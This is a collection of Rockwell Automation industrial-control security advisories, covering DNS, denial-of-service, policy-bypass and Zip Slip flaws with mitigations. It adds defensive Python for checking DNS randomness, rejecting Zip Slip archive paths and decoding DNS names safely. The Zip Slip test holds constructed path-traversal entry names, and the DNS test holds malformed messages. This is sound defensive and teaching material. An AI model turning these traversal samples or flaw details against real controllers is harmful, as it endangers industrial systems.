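    # Transaction ID: n distinct random values have entropy log2(n); allow 1 bit
    # of slack for chance collisions, and reject counters outright.
    txid_ok = True
    if entropy_bits(txids) < math.log2(n) - 1:
        findings.append("transaction IDs repeat far more than chance allows")
        txid_ok = False
    if looks_sequential(txids):
        findings.append("transaction IDs increment like a counter")
        txid_ok = False

    # Source port: a fixed or narrowly ranged port removes the second half of
    # the (txid, port) pair a forged response must match.
    sport_ok = True
    if len(set(sports)) < n / 2:
        findings.append("source port reused across most queries")
        sport_ok = False
    if max(sports) - min(sports) < 1024 or looks_sequential(sports):
        findings.append("source ports drawn from a narrow or predictable range")
        sport_ok = False
    return {"txid_ok": txid_ok, "sport_ok": sport_ok, "findings": findings}


# Constructed captures: a counter-style TXID with a fixed source port (the weak
# pattern), and a seeded generator standing in for a well-behaved stack.
WEAK_DEVICE = [((0x0100 + i) & 0xFFFF, 1024) for i in range(64)]
_rng = random.Random(7)
GOOD_DEVICE = [(_rng.randrange(0x10000), _rng.randrange(1024, 0x10000)) for _ in range(64)]
```

In practice the pairs come from a capture filter on UDP destination port 53 for the device's address; 32 or more queries are needed before the entropy estimate means much.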


CVE-2021-36762: TFTP packet processing function does not ensure that the filename is null-terminated

Rockwell Automation is not impacted by this vulnerability.

Risk Mitigation & User Action

Customers using the affected firmware are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.
Product: 20-COMM-ER
Vulnerabilities: CVE-2021-31226, CVE-2021-31227
Mitigation: Disable the webserver. See the product’s user manual for the procedure to do this.

General Security Guidelines

  • Use proper network infrastructure controls, such as firewalls, to help confirm that DNS traffic from unauthorized sources is blocked.
  • Block traffic to port 80 (HTTP) and ICMP traffic using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • 20-COMM-ER user manual, publication 20COMM-UM015B-EN-P
  • ICSA-21-217-01
  • https://www.hcc-embedded.com/support/security-advisories
  • https://www.forescout.com/resources/infrahalt-discovering-mitigating-large-scale-ot-vulnerabilities
  • https://www.forescout.com/blog/new-critical-operational-technology-vulnerabilities-found-on-nichestack/
  • https://jfrog.com/blog/infrahalt-14-new-security-vulnerabilities-found-in-nichestack/
  • https://literature.rockwellautomation.com/idc/groups/literature/documents/um/20comm-um015_-en-p.pdf

High
PN1571 | PN1571 | MicroLogix 1100 Persistent CPU Fault Vulnerability
Published Date:
July 09, 2021
Last Updated:
July 09, 2021
CVE IDs:
CVE-2021-33012
Products:
1763 MicroLogix 1100
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision History
Revision Number
1.0
Revision History

Version 1.0 – July 9, 2021. Initial Release

Executive Summary

Rockwell Automation received a report from Beau Taub at Bayshore Networks regarding a vulnerability in the MicroLogix 1100. If successfully exploited, this vulnerability may limit the availability of the programmable logic controller. Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • MicroLogix 1100, all versions.

Vulnerability Details

CVE-2021-33012: Persistent fault may lead to denial of service conditions.

A vulnerability exists in the MicroLogix 1100 that may allow a remote, unauthenticated attacker to cause a persistent fault condition. This condition prevents the PLC from entering a RUN state and cannot be cleared by resetting the device. If successfully exploited, this vulnerability will cause the controller to fault when the controller is switched to RUN mode.

CVSS v3.1 Base Score: 8.6/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected firmware are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Vulnerability: CVE-2021-33012
Suggested Actions: Put the controller mode switch to “Run” mode. Customers should consider migrating to a more contemporary controller. Customers are encouraged to have a backup copy of the project in case it is necessary to recover from an event.

A controller in this state can be recovered by downloading a new project to the controller or an offline copy of the project.

Additionally, Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines on how to use Rockwell Automation products to improve the security of their industrial automation systems.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

  • Use proper network infrastructure controls, such as firewalls, to help confirm that EtherNet/IP™ network traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

General Mitigations

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-189-01

High
PN1569 | PN1569 | FactoryTalk Security Remote Desktop Connection ‘Computer Name’ Policy Bypass Vulnerability
Published Date:
June 10, 2021
Last Updated:
June 10, 2021
CVE IDs:
CVE-2021-32960
Products:
FactoryTalk Services Platform
CVSS Scores:
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 10, 2021. Initial Release.

Executive Summary

Rockwell Automation discovered a vulnerability in FactoryTalk® Security, part of FactoryTalk Services Platform. This vulnerability, if successfully exploited, may allow remote, authenticated users to bypass FactoryTalk Security policies that are based on a computer name. These policies may be important to customers who are concerned about users at an engineering workstation having ‘line-of-sight’ visibility to the systems they are operating.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Services Platform v6.11 and earlier, if FactoryTalk Security is enabled and deployed.

Vulnerability Details

CVE-2021-32960: FactoryTalk Security protection mechanism failure for remote desktop connections
FactoryTalk Services Platform contains a vulnerability that may allow a remote, authenticated attacker to bypass FactoryTalk Security policies based on the computer name. If successfully exploited, this may allow an attacker to have the same privileges as if they were logged on to the client machine.

CVSS v3.1 Base Score: 8.5/10 [HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these tactics with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability: CVE-2021-32960
Suggested Actions: Apply FactoryTalk Services Platform v6.20 or later.

If upgrade is not possible, customers should consider the following guidance:
  • When possible, do not utilize remote desktop connections.
  • Use Microsoft® Event Logger or similar event logging application to monitor atypical remote desktop connections and disconnections. Information on Setting up Windows® Event Logs is available at Knowledgebase Article QA5965.

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Medium
PN1566 | PN1566 | Micro800 and MicroLogix 1400 Vulnerable to Man-in-the-Middle Attack
Published Date:
May 25, 2021
Last Updated:
May 25, 2021
CVE IDs:
CVE-2021-32926
Products:
Micro800, 1766 MicroLogix 1400
CVSS Scores:
6.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision History
Revision Number
1.0
Revision History
Version 1.0 – May 25, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Adeen Ayub from Virginia Commonwealth University, Hyunguk Yoo from The University of New Orleans, and Irfan Ahmed from Virginia Commonwealth University regarding a man-in-the-middle vulnerability in the Micro800™ and MicroLogix™ 1400. If successfully exploited, this vulnerability may result in denial-of-service conditions. To recover from this condition, a firmware flash on the controller will need to be performed. Firmware flashing will put the controller into the default state and the user program and data will be lost.

Customers using affected products are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Micro800, all versions.
MicroLogix 1400, version 21 and later when Enhanced Password Security is enabled.

Vulnerability Details

CVE-2021-32926: Improper authentication may lead to denial of service conditions
A vulnerability exists in how the Micro800 and MicroLogix 1400 controllers authenticate password change requests. If successfully exploited, this vulnerability may allow a remote, unauthenticated attacker to perform a man-in-the-middle attack in which the attacker intercepts the message that includes the legitimate, new password hash and replaces the legitimate password hash with an illegitimate hash. The user would no longer be able to authenticate to the controller, causing a denial-of-service condition.

CVSS v3.1 Base Score: 6.1/10 [MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected controllers are directed towards risk mitigation. Rockwell Automation has determined that this vulnerability cannot be remediated with a patch. Customers are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

Vulnerability: CVE-2021-32926
Suggested Actions: Confirm that setting and updating the password for the controller is done within a trusted network environment that is only accessible to authorized users.

If this vulnerability is successfully exploited, the password can be reset by performing a firmware flash on the controller. Firmware flashing will put the controller into the default state and the user program and data will be lost.

A comprehensive defense-in-depth strategy can reduce the risk of this vulnerability. To leverage the vulnerability, an unauthorized user would require access to the same network as the controller. Customers should confirm they are employing proper networking segmentation and security controls.

Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines on how to use Rockwell Automation products to improve the security of their industrial automation systems.

General Security Guidelines

  • Use proper network infrastructure controls, such as firewalls, to confirm that CIP™ traffic from unauthorized sources is blocked.
  • Block all traffic to EtherNet/IP™ or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 44818 and Port# 2222 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1565 | PN1565 | Connected Components Workbench Vulnerable to Multiple Phishing-Style Attacks
Published Date:
May 13, 2021
Last Updated:
May 13, 2021
CVE IDs:
CVE-2021-27473, CVE-2021-27471, CVE-2021-27475
Products:
Connected Components Workbench
CVSS Scores:
6.1, 7.7, 8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 13, 2021. Initial Release.

Executive Summary

Rockwell Automation received a report from Mashav Sapir of Claroty regarding three vulnerabilities in Connected Components Workbench™. If successfully exploited, these vulnerabilities may result in directory traversal, privilege escalation, and arbitrary code execution. These vulnerabilities all require user interaction through a phishing attack, for example, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Connected Components Workbench v12.00.00 and below.

Vulnerability Details

CVE-2021-27475: Deserialization of untrusted data may result in arbitrary code execution
Connected Components Workbench does not limit the objects that can be deserialized. This vulnerability allows an attacker to craft a malicious serialized object that, if opened by a local user in Connected Components Workbench, may result in arbitrary code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2021-27471: Directory traversal vulnerability may lead to privilege escalation
The parsing mechanism that processes certain file types does not sanitize file paths. This may allow an attacker to craft malicious files that, when opened by Connected Components Workbench, traverse the file system. If successfully exploited, an attacker would be able to overwrite existing files and create additional files with the same permissions as the Connected Components Workbench software. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 7.7/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2021-27473: Improper input sanitization may lead to privilege escalation
Connected Components Workbench does not sanitize paths specified within the .ccwarc archive file during extraction. This type of vulnerability is commonly referred to as a Zip Slip. A local, authenticated attacker can create a malicious .ccwarc archive file that, when opened by Connected Components Workbench, allows the attacker to gain the privileges of the software. If the software is running at SYSTEM level, the attacker will gain admin-level privileges. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 6.1/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
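Both archive-path findings above (CVE-2021-27471 and CVE-2021-27473) come down to one missing check: an entry name taken from the archive is joined to the extraction directory without confirming that the result still lies inside that directory. The Python below is an added example written for this page, not Rockwell Automation code. It assumes the .ccwarc file is a ZIP container (the advisory only says it is an archive and calls the flaw a Zip Slip) and uses constructed entry names; the destination path and file names are illustrative. It shows the pre-extraction check an extractor has to make, covering POSIX and Windows separators as well as absolute and drive-letter paths, and it refuses the whole archive if any single entry would escape.

```python
"""Zip Slip check before extracting an archive-based project file.

Added example, not Rockwell Automation code.  Assumes the .ccwarc file is a
ZIP container (assumption: the advisory does not document the real layout).
The control is the one an extractor must apply before it writes anything:
resolve every entry name against the destination directory and refuse the
whole archive if any entry would land outside it.
"""
import io
import ntpath
import os
import posixpath
import tempfile
import zipfile


def escapes_destination(entry_name: str, dest: str) -> bool:
    """True if writing entry_name under dest would create a file outside dest."""
    # Archives produced on Windows may carry backslash separators; normalise
    # both forms, otherwise "..\\..\\x" slips through a "/"-only check.
    name = entry_name.replace("\\", "/")
    # Absolute paths, drive letters and UNC prefixes never belong in a project archive.
    if posixpath.isabs(name) or ntpath.splitdrive(entry_name)[0]:
        return True
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, *name.split("/")))
    # After ".." resolution the target must still have dest as a path prefix.
    # commonpath compares whole components, so "dest2/x" is not mistaken for "dest".
    return os.path.commonpath([dest_real, target]) != dest_real


def scan_archive(archive_bytes: bytes, dest: str) -> list:
    """Return the entry names that must not be extracted (empty list means safe)."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return [info.filename for info in zf.infolist()
                if escapes_destination(info.filename, dest)]


def extract_project(archive_bytes: bytes, dest: str) -> list:
    """Fail closed: extract nothing unless every entry passed the check."""
    offenders = scan_archive(archive_bytes, dest)
    if offenders:
        raise ValueError("refusing archive with traversal entries: %r" % offenders)
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def build_archive(entries: dict) -> bytes:
    """Build an in-memory ZIP; entry names are stored exactly as given."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Destination the extractor would use; it does not need to exist for the check.
DEST = os.path.join(tempfile.gettempdir(), "ccw_import")

# Constructed archives, not real project files.
BENIGN_ARCHIVE = build_archive({
    "Pump3/Pump3.ccwsln": b"<Solution/>",
    "Pump3/Micro850/MainProgram.ld": b"(ladder logic)",
})
MALICIOUS_ARCHIVE = build_archive({
    "Pump3/Pump3.ccwsln": b"<Solution/>",
    "../../Users/Public/Desktop/update.lnk": b"(payload)",     # POSIX-style traversal
    "..\\..\\ProgramData\\Rockwell\\helper.dll": b"(payload)",  # Windows-style traversal
    "C:\\Windows\\Temp\\dropper.exe": b"(payload)",             # absolute drive path
})

if __name__ == "__main__":
    print("benign:", scan_archive(BENIGN_ARCHIVE, DEST))
    print("malicious:", scan_archive(MALICIOUS_ARCHIVE, DEST))
```

Python's own `zipfile.extractall` already strips absolute prefixes and `..` components, so the explicit check matters when the extractor is written in another language or writes files itself from entry names; symbolic-link entries, which can also be used to escape the destination, are outside the scope of this check.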

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability | Suggested Actions
CVE-2021-27475, CVE-2021-27471, CVE-2021-27473 | Upgrade to Connected Components Workbench v13.00.00 or later. (Link)

If upgrade is not possible, customers should consider deploying the following mitigations:
  • Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted .ccwarc files with Connected Components Workbench. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use Microsoft® AppLocker or a similar application allow-listing tool to help mitigate risk. Information on using AppLocker with Rockwell Automation products is available in Knowledgebase Article QA17329.
  • Confirm that the least-privilege user principle is followed, and that user/service account access to shared resources (such as a database) is only granted with the minimum number of rights needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Critical
PN1564 | DNS Name:Wreck Vulnerabilities Affect Multiple Rockwell Automation Products
Published Date:
April 28, 2021
Last Updated:
April 28, 2021
CVE IDs:
CVE-2016-20009
Products:
5069 CompactLogix, Communications Modules, 1769 CompactLogix Controllers, 1756 ControlLogix
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 - April 26, 2021. Initial release.
Version 1.1 - April 28, 2021. Updated affected products and suggested user actions.

Executive Summary

On April 12, 2021 Forescout and JSOF released a report titled "NAME:WRECK" regarding nine DNS-related vulnerabilities in four TCP/IP stacks used by many technology vendors, including Rockwell Automation™. Rockwell Automation is impacted by one of these nine reported vulnerabilities. This vulnerability, if successfully exploited, may result in remote code execution.

Rockwell Automation continues to investigate the impact of these vulnerabilities and will update this advisory if additional products are impacted. We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Customers using potentially affected products are encouraged to evaluate their own systems and apply the appropriate mitigations from those listed below. Additional details relating to the discovered vulnerability and recommended countermeasures are provided herein.

Affected Products

Product Family | Catalogs | Affected Versions
Compact 5000™ I/O EtherNet/IP Adapter | 5069-AEN2TR | All versions.
CompactLogix 5370 | 1769-L1y, 1769-L2y, 1769-L3y | All versions prior to v30.
CompactLogix 5370 | 1769-L3yS | All versions prior to v30, excluding v28.015.
ControlLogix® 5580 | 1756-L8 | All versions prior to v30.
CompactLogix 5380 | 5069-L3 | All versions prior to v30.
ControlLogix EtherNet/IP Module | 1756-EN2T/D, 1756-EN2TK/D, 1756-EN2TXT/D, 1756-EN2F/C, 1756-EN2FK/C, 1756-EN2TR/C, 1756-EN2TRK/C, 1756-EN2TRXT/C, 1756-EN3TR/B, 1756-EN3TRK/B, 1756-EN2TPK/A, 1756-EN2TPXT/A | All versions prior to v11.001.
ControlLogix EtherNet/IP Module | 1756-EN2TP/A | All versions prior to v10.020.

Note: GuardLogix® 5580 and Compact GuardLogix® 5380 are not affected by this vulnerability.

Vulnerability Details

CVE-2016-20009: Stack-based overflow in the IPnet DNS client may lead to remote code execution
In Wind River VxWorks versions 6.5 through 7, the DNS client (IPnet) has a stack-based overflow on the message decompression function. This may allow a remote, unauthenticated attacker to perform remote code execution.

CVSS v3.1 Base Score: 9.8/10[CRITICAL]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
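The IPnet defect sits in the routine that expands a compressed domain name (RFC 1035 section 4.1.4): label lengths and compression pointers taken from an untrusted response are followed without enough checking, so a crafted reply can push the decoder past the end of the message or past the fixed-size name buffer on the stack. The Python below is an added example written for this page, not IPnet or Rockwell Automation code, and it does not reconstruct the IPnet bug; it shows the checks a decompression routine needs, exercised against constructed messages (a 12-byte zero header stands in for a real DNS header).

```python
"""Bounds-checked DNS name decompression (RFC 1035 section 4.1.4).

Added example, not Wind River IPnet or Rockwell Automation code.  Every
length byte and pointer is validated against the message, pointers may only
reach backwards, and the expanded name is capped at the 255-octet maximum,
so a hostile response cannot run the decoder past the message or past a
fixed-size name buffer.
"""

MAX_NAME_OCTETS = 255   # RFC 1035: wire-format length of a whole name
MAX_LABEL_OCTETS = 63   # RFC 1035: one label


class MalformedName(ValueError):
    """Raised instead of silently reading or writing out of bounds."""


def read_name(msg: bytes, offset: int):
    """Decode the name at msg[offset]; return (dotted_name, offset_after).

    offset_after is where the caller continues parsing the record: just after
    the first pointer met, or after the terminating zero if no pointer was
    used.  Following a pointer never advances that position.
    """
    labels = []
    wire_octets = 0          # octets the expanded name would occupy
    pos = offset
    resume_at = None

    while True:
        if pos >= len(msg):
            raise MalformedName("length byte at %d is past the end of the message" % pos)
        length = msg[pos]

        if length & 0xC0 == 0xC0:                       # 11xxxxxx: compression pointer
            if pos + 1 >= len(msg):
                raise MalformedName("truncated compression pointer at %d" % pos)
            target = ((length & 0x3F) << 8) | msg[pos + 1]
            if resume_at is None:
                resume_at = pos + 2
            # A pointer must reference a prior occurrence of a name.  Requiring
            # target < pos keeps every target inside the message and makes a
            # chain of pointers strictly decreasing, so pointers alone cannot loop.
            if target >= pos:
                raise MalformedName("pointer at %d does not point backwards" % pos)
            pos = target
            continue

        if length & 0xC0:                               # 01xxxxxx / 10xxxxxx
            raise MalformedName("reserved label type 0x%02x at %d" % (length, pos))

        pos += 1
        if length == 0:                                 # root label: end of name
            break
        if length > MAX_LABEL_OCTETS:
            raise MalformedName("label longer than 63 octets at %d" % (pos - 1))
        if pos + length > len(msg):
            raise MalformedName("label at %d runs past the end of the message" % (pos - 1))
        # The output cap also bounds loops that mix labels with backward
        # pointers: every pass through a label adds at least two octets.
        wire_octets += length + 1
        if wire_octets + 1 > MAX_NAME_OCTETS:
            raise MalformedName("expanded name exceeds 255 octets")
        labels.append(msg[pos:pos + length].decode("ascii", "replace"))
        pos += length

    if resume_at is None:
        resume_at = pos
    return (".".join(labels) if labels else "."), resume_at


def decode_name(msg: bytes, offset: int) -> str:
    """Wrapper returning 'ok:<name>' or 'malformed:<reason>'."""
    try:
        name, _ = read_name(msg, offset)
        return "ok:" + name
    except MalformedName as exc:
        return "malformed:" + str(exc)


# Constructed messages, not captured traffic.  12 zero bytes stand in for the header.
HEADER = bytes(12)
# Question name, then an answer name that is a legitimate pointer back to it.
GOOD = HEADER + b"\x03www\x07example\x03com\x00" + b"\xC0\x0C"
# Label claims 63 octets but the message ends after 10.
OVERRUN = HEADER + b"\x3f" + b"a" * 10
# Pointer to itself.
SELF_POINTER = HEADER + b"\xC0\x0C"
# Label "a" followed by a pointer back to that label: passes the backward-pointer
# rule on every hop, so only the 255-octet cap stops it.
LABEL_LOOP = HEADER + b"\x01a" + b"\xC0\x0C"

if __name__ == "__main__":
    for label, msg in [("GOOD", GOOD), ("OVERRUN", OVERRUN),
                       ("SELF_POINTER", SELF_POINTER), ("LABEL_LOOP", LABEL_LOOP)]:
        print(label, decode_name(msg, 12))
```

In a C implementation the same three checks guard three different memory errors: the message-end checks prevent over-reads of the receive buffer, the backward-pointer rule prevents unbounded recursion or an out-of-range index, and the 255-octet cap is what protects the stack buffer the name is expanded into.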

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware revision that addresses the associated risk. Customers are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Product Family | Catalogs | Suggested Actions
Compact 5000™ I/O EtherNet/IP Adapter | 5069-AEN2TR | Will not be patched. Suggested action is to migrate to the 5069-AENTR.
CompactLogix 5370 | 1769-L1y, 1769-L2y, 1769-L3y | Apply v30 or later.
CompactLogix 5370 | 1769-L3yS | Apply v28.015, or v30 or later.
ControlLogix® 5580 | 1756-L8 | Apply v30 or later.
CompactLogix 5380 | 5069-L3 | Apply v30 or later.
